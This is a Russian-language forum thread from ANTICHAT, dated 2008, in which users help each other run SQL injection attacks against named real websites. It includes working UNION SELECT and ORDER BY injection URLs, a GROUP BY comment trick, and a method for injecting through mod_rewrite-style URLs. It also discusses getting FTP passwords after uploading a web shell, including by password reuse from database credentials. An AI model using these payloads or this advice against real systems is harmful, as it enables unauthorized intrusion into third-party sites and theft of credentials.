ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
31.07.2008, 01:28
|
|
Участник форума
Регистрация: 28.07.2008
Сообщений: 158
Провел на форуме:
728470
Репутация:
115
|
|
Сообщение от Ershik
Провожу иньекцию по этой ссылке
https://forum.antichat.ru/thread35599.html
Получается следующее:
http://www.avia.ru/pr/?id=-1'+order+by+1--
Order by запрещен??
вероятнее всего твой запрос проходит, а на следующем скул уже не прокатывает. И такой -- комментарий на будущее должен с обоих сторон обрамлятся пробелом +by+1+--+, хотя на некоторых серваках вроде и так пашет...
|
|
|
31.07.2008, 01:46
|
|
Участник форума
Регистрация: 28.07.2008
Сообщений: 158
Провел на форуме:
728470
Репутация:
115
|
|
Сообщение от MaSTeR GэN
Хм не чего не пойму )
http://www.laptopshowcase.co.uk/downloads.php?id=1 and 1=1
http://www.laptopshowcase.co.uk/downloads.php?id=1 and substring(version(),1,1)=4
запросы такого рода проходят а что то типа
http://www.laptopshowcase.co.uk/downloads.php?id=1 order by 1
выдает ошибку типа:
right syntax to use near 'GROUP BY downloads.id
если завершить запрос "--" or "*/" то ошибка такого рода :
"Error performing query: Mixing of GROUP columns (MIN(),MAX(),COUNT()...) with no GROUP columns is illegal if there is no GROUP BY clause"
подскажите в чем проблема ?
В запросе используется одна из функций (MIN(),MAX(),COUNT().. При их использовании обязательна группировка по одному из полей, а ты обрезаешь завершающий групбай комментарием...
http://www.laptopshowcase.co.uk/downloads.php?id=1+group+by+1/* вот так надо
|
|
|
|
01.08.2008, 02:27
|
|
Участник форума
Регистрация: 17.06.2008
Сообщений: 214
Провел на форуме:
964766
Репутация:
228
|
|
Кто-нибудь знает как можно обойти mod_rewrite для проведения sql-иньекций? А то он надоел уже, оч часто попадается  |
|
|
|
01.08.2008, 03:42
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552
Репутация:
568
|
|
вот сайт про медведа......
http://viperson.ru/main.php?arcnews=1+union+select+1,2,3,4,5,6,7,8,9, 10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 ,27,28,29,30/*&M_sel=200808
там уязвимых переменных много.. но неодну не вышло разкрутить.. толи я спать хочу толи еще чтот )
http://viperson.ru/main.php?sort=9999999+union+select+1,2,3,4,5,6,7,8 ,9,10,11/*
кароч. смотрите...
и еще хотел спросить.... если я залиш шелл. и у меня есть возможность просматривать все что до и после /home , как узнать пароль от ФТП ?
Последний раз редактировалось sabe; 01.08.2008 в 21:15..
|
|
|
|
02.08.2008, 10:19
|
|
Участник форума
Регистрация: 16.11.2006
Сообщений: 230
Провел на форуме:
599789
Репутация:
227
|
|
и еще хотел спросить.... если я залиш шелл. и у меня есть возможность просматривать все что до и после /home , как узнать пароль от ФТП ?
+1
|
|
|
|
02.08.2008, 10:33
|
|
Участник форума
Регистрация: 17.01.2008
Сообщений: 170
Провел на форуме:
1608606
Репутация:
105
|
|
"Кто-нибудь знает как можно обойти mod_rewrite для проведения sql-иньекций? А то он надоел уже, оч часто попадается"
совет: для начала почитай про mod_rewrite, как он вообще работает и "взаимодействует" со скриптами и тд.
а ответ: пример, ссыль
http://www.site.ru/index-edit-3.htm или немного в другом виде http://www.site.ru/index/edit/3
оригинал урл предположительно выглядит так http://www.site.ru/index.php?action=edit&id=3, вот и проводи инъекцию http://www.site.ru/index-edit-3+group+by+100/*.htm и тд
|
|
|
|
02.08.2008, 11:01
|
|
Постоянный
Регистрация: 01.01.2007
Сообщений: 796
Провел на форуме:
2693408
Репутация:
861
|
|
и еще хотел спросить.... если я залиш шелл. и у меня есть возможность просматривать все что до и после /home , как узнать пароль от ФТП ?
Если админ не хранит их в текстовике memory.txt ( ), то только надеяца, что пассы от бд или ещё чего-нибудь совпадут с фтп.
|
|
|
|
02.08.2008, 11:48
|
|
Участник форума
Регистрация: 17.06.2008
Сообщений: 214
Провел на форуме:
964766
Репутация:
228
|
|
Подскажите какие таблицы можно использовать еще, если при таком запросе:
http://site.ru/index.php?id=-3+union+select+version(),2,3+from+infomation_schem a.tables--
вылазит:
SELECT command denied to user: 'user@host' for table 'table' ?
|
|
|
|
02.08.2008, 12:12
|
|
Reservists Of Antichat - Level 6
Регистрация: 09.07.2008
Сообщений: 102
Провел на форуме:
1744345
Репутация:
573
|
|
Сообщение от USAkid
Подскажите какие таблицы можно использовать еще, если при таком запросе:
http://site.ru/index.php?id=-3+union+select+version(),2,3+from+infomation_schem a.tables--
вылазит:
SELECT command denied to user: 'user@host' for table 'table' ?
Использовать те таблицы, к которым имеет доступ юзер под которым ты подключен к бд 
к INFORMATION_SCHEMA доступа нет пробуй вручную перебирать или посредством скриптов.
|
|
|
|
02.08.2008, 14:52
|
|
Moderator - Level 7
Регистрация: 22.09.2006
Сообщений: 531
Провел на форуме:
3818187
Репутация:
369
|
|
народ подскажите вот с этим
http://www.irintech.com/x1/blogarchive.php?id=-764+union+select+1,2,3,4,5,6,7,8/*
вроде полей по order by 8 а так че то ошибку выдает че за х?
и таких блин куча обьясните раз и на всегда
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
